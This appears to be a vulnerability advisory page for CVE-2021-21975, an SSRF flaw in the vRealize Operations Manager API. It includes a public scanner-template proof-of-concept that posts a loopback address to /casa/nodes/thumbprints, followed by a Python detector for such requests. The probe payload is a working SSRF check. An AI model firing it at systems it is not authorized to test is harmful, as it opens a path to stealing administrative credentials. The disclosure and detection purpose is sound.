CVE-2021-21975: vRealize Operations Manager API SSRF (VMWare Operations)

Date: 2025-09-01 | Affected software: Unknown | PoC: Public

Vulnerability description

Server Side Request Forgery in the vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a Server Side Request Forgery attack to steal administrative credentials.

PoC code [public]

id: CVE-2021-21975

info:
  name: vRealize Operations Manager API SSRF (VMWare Operations)
  author: Loneyer
  severity: high
  description: |-
    Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.
  reference:
    - https://www.vmware.com/security/advisories/VMSA-2021-0022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21975
  tags: cve,cve2021,vmware,ssrf
  created: 2021/04/20

rules:
  r0:
    request:
      method: POST
      path: /casa/nodes/thumbprints
      headers:
        Content-Type: application/json
      body: |
        ["127.0.0.1:443/ui/"]
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager"))
expression: r0()
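
Detection side of the rule above, as an added example that is not part of the original template or any VMware code: it inspects a captured request to `/casa/nodes/thumbprints` and reports array entries that do not look like plain node addresses. Assumptions: request bodies are available (for instance from a reverse proxy that logs them), a legitimate entry is a bare `host[:port]`, and the function names and the node allowlist are hypothetical.

```python
import ipaddress
import json
import re

ENDPOINT = "/casa/nodes/thumbprints"
# Assumption: a legitimate entry is a bare host or host:port with no URL path.
HOST_PORT = re.compile(r"^(?P<host>\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(?::(?P<port>\d{1,5}))?$")

def entry_findings(entry, allowed_hosts):
    """Return the reasons one array entry looks like an SSRF attempt."""
    if not isinstance(entry, str):
        return ["entry is not a string"]
    m = HOST_PORT.match(entry.strip())
    if not m:
        return ["not a bare host[:port] (path, scheme or userinfo present)"]
    host = m.group("host").strip("[]").lower()
    reasons = []
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_link_local or ip.is_unspecified:
            reasons.append("loopback, link-local or unspecified address")
    except ValueError:  # not an IP literal, so check loopback names
        if host == "localhost" or host.endswith(".localhost"):
            reasons.append("loopback, link-local or unspecified address")
    if host not in allowed_hosts:
        reasons.append("host is not in the node allowlist")
    return reasons

def inspect_request(method, path, body, allowed_hosts):
    """Return {entry: [reasons]} for a captured request; empty dict if clean."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != ENDPOINT:
        return {}
    try:
        entries = json.loads(body)
    except (TypeError, ValueError):
        return {"<body>": ["body is not valid JSON"]}
    if not isinstance(entries, list):
        return {"<body>": ["body is not a JSON array"]}
    allowed = {h.lower() for h in allowed_hosts}
    found = {}
    for e in entries:
        reasons = entry_findings(e, allowed)
        if reasons:
            found[str(e)] = reasons
    return found

if __name__ == "__main__":  # constructed request: body from the rule above, hypothetical allowlist
    print(inspect_request("POST", ENDPOINT, '["127.0.0.1:443/ui/"]', ["10.0.0.11"]))
```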